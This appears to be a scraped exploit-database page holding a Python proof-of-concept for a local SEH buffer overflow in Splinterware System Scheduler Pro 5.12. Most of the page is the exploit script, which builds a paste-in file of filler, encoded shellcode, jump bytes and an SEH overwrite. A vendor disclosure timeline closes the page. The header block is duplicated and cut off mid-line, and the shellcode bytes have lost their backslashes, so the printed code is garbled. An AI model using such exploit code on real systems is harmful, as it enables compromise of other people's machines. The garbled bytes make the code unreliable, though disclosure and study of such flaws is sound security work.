Splinterware System Scheduler Pro 5.12 Buffer Overflow

Details: Written by: khalil shreateh; Category: Vulnerabilities; Hits: 252

#!/usr/bin/python

#
# Exploit Author: bzyo
# Twitter: @bzyo_
# Exploit Title: Splinterware System Scheduler Pro 5.12 - Local Buffer Overflow (SEH)
# Date: 07-21-18< #!/usr/bin/python

#
# Exploit Author: bzyo
# Twitter: @bzyo_
# Exploit Title: Splinterware System Scheduler Pro 5.12 - Local Buffer Overflow (SEH)
# Date: 07-21-18
# Vulnerable Software: System Scheduler Pro 5.12
# Vendor Homepage: https://www.splinterware.com
# Version: 5.12
# Software Link: https://www.splinterware.com/download/ssproeval.exe
# Tested Windows 7 SP1 x86
#
#
#
# PoC
# 1. generate sysschedule512.txt, copy contents to clipboard
# 2. open application
# 3. select view, preferences and in the Startup/Logging tab
# 4. paste contents from clipboard to the logfile location field
# 5. exit preferences
# 6. create dummy task to open notepad.exe
# 7. run task, notepad opens
# 8. close notepad
# 9. pop-up window appears and application crashes

import struct

filename="sysschedule512.txt"

junk = "A"*55

#thx giuseppe d'amore for edb-id 28996; edited pop-up msg & encoded
#msfencode -e x86/alpha_mixed -i bzyo; size 287
msg = ("x89xe5xdaxc4xd9x75xf4x5ax4ax4ax4ax4ax4ax4a"
"x4ax4ax4ax4ax4ax43x43x43x43x43x43x37x52x59"
"x6ax41x58x50x30x41x30x41x6bx41x41x51x32x41"
"x42x32x42x42x30x42x42x41x42x58x50x38x41x42"
"x75x4ax49x74x71x58x52x4cx72x30x30x52x44x6c"
"x4bx75x42x4cx4bx62x72x34x4cx4ex6bx30x52x45"
"x4cx6ex6bx73x72x56x68x6cx4bx64x32x31x30x6c"
"x4bx66x72x4dx50x33x4ex66x6cx50x33x32x55x39"
"x62x4fx79x6ax67x43x33x62x58x67x4cx6cx4bx56"
"x37x33x48x66x61x4ax62x4ex6bx51x6ax77x50x55"
"x51x49x57x66x51x58x6dx4ex6bx30x34x6cx6fx76"
"x61x69x56x57x35x4dx51x67x4ex31x56x35x31x74"
"x34x63x51x64x35x49x62x4fx71x43x4ex46x68x53"
"x75x53x48x71x79x64x34x30x75x5ax49x6cx4bx30"
"x7ax51x34x33x31x59x57x42x46x4cx4bx44x6cx50"
"x6fx4ex6bx52x5ax45x4cx65x51x4bx77x6ex6bx71"
"x6cx6ex4fx6bx4cx55x51x38x47x51x78x37x51x75"
"x71x37x51x76x61x65x38x71x52x61x4ax43x69x50"
"x4fx50x68x31x30x55x71x64x61x67x51x6dx59x48"
"x61x6bx4ex73x79x66x6bx44x71x6bx70x66x31x50"
"x50x49x6fx68x57x41x41")

junk1 = "B"*56

#jmp back to As
jmp3 = "xe9x6fxfexffxff"

junk2= "C"*4

#jmp back after random 8 nulls added
jmp2 = "xebxf5"

junk3 = "C"*10

#jmp back before random 8 nulls added
jmp = "xebxf2xccxcc"

seh = struct.pack('<L',0x00413121)

buffer = junk + msg + junk1 + jmp3 + junk2 + jmp2 + junk3 + jmp + seh

textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()

# Timeline
#---------------------------------------------------------------------
#05-02-18: Vendor notified of vulnerability
#05-03-18: Initial vendor response
#05-09-18: Issues resolved after some back and forth discussion
#07-20-18: New version released, 5.13, with issue fixed
#07-21-18: Submitted public disclosure